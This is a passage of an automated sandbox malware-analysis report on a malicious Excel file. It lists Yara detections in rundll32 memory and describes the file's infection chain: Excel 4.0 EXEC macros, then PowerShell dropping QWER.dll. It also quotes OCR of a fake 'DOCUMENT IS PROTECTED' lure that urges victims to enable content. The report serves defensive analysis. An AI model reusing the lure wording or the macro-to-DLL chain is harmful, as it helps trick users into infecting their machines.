                            Source: Yara matchFile source: 12.2.rundll32.exe.2850000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4b0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a30000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.b20000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.cc0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e00000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3020000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a30000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a30000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.b80000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2860000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.470000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c90000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.25e0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.440000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2dd0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.24f0000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.30b0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.ac0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c60000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.b20000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d00000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.b10000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.5a0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.b50000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.b50000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26a0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.cc0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4e0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26d0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e00000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2860000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c60000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.8f0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.b50000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.840000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.b00000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26a0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.ae0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bc0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ec0000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27e0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d00000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27e0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.b50000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e90000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.b10000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\QWER.dll, type: DROPPED

                            System Summary

                            barindex
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 Previewing is not available for protected documents. 16 17 Yo
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 16 17 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24 25 26 27 28 29 3
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 U LI
                            Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 , , Previewing is not available for protected documents. 16 ::
                            Source: Screenshot number: 8Screenshot OCR: protected documents. 16 :: You have to press :ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 U LI 25 26 27 28 29
                            Document contains OLE streams with names of living off the land binaries
                            Source: 364453688149503140239183.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Source: 364453688149503140239183.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: 364453688149503140239183.xlsInitial sample: EXEC
                            Source: 364453688149503140239183.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AB87
